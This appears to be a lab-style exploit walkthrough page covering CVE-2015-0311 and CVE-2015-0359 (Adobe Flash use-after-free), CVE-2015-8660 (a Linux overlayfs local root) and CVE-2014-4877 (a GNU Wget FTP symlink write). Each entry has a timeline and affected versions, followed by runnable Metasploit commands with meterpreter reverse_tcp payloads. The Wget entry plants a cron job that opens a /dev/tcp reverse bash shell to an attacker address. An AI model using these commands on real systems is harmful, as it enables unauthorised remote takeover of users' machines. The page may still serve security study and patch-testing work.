CVE-2015-0311 Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

Timeline :

Vulnerability discovered exploited in the wild the 2015-01-21
Patched by the vendor the 2015-01-22
Metasploit PoC provided the 2015-03-09

PoC provided by :

Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0311
APSA15-01

Affected version(s) :

Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287

Description :

This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.

Commands :

use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

llowfullscreen=”allowfullscreen”>

CVE-2015-8660 Linux Kernel OverLay Fail

Timeline :

Vulnerability discovered by Nathan Williams and reported to vendor
Patched by the vendor the 2015-12-04
Advisory release the 2015-12-28
PoC provided by rebel the 2015-01-06

PoC provided by :

rebel

Reference(s) :

CVE-2015-8660

Affected version(s) :

Linux kernel through 4.3.3

Tested on :

Ubuntu Server 64-bit 15.10 with python installed

Description :

The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.

Commands :

gcc -o CVE-2015-8660 CVE-2015-8660.c
id
./CVE-2015-8660
id

CVE-2014-4877 GNU Wget FTP Symlink Arbitrary Filesystem Access

Timeline :

Vulnerability discovered by hdm the 2014-08-24
Vulnerability notified to vendor the 2014-08-24
Patched by the vendor the 2014-09-01
Advisory release the 2014-10-27
Metasploit PoC provided the 2014-10-27

PoC provided by :

HD Moore of Rapid7

Reference(s) :

CVE-2014-4877

Affected version(s) :

All GNU Wget before version 1.16

Tested on :

Ubuntu Server 12.10 with GNU Wget version 1.13.4 and root user

Description :

This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.

Commands :

1. Create a reverse bash payload

msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138

2. Create a crontab file that run once a minute, that launches the bellow command

cat>cronshell <usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash -c '0<&148-;exec 148<>/dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148’; rm -f /etc/cron.d/cronshell
EOD

3. Run a shell listener in Metasploit

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.6.138
run -j

4. Run the wget_symlink_file_write Metasploit module

use auxiliary/server/wget_symlink_file_write
set SRVHOST 192.168.6.138
set TARGET_FILE /etc/cron.d/cronshell
set TARGET_DATA file:/root/cronshell
set SRVPORT 21
run

5. On victim machine execute the bellow command

wget -m ftp://192.168.6.138:21/

6. Get the Metasploit session

session -i 1

id
uname -a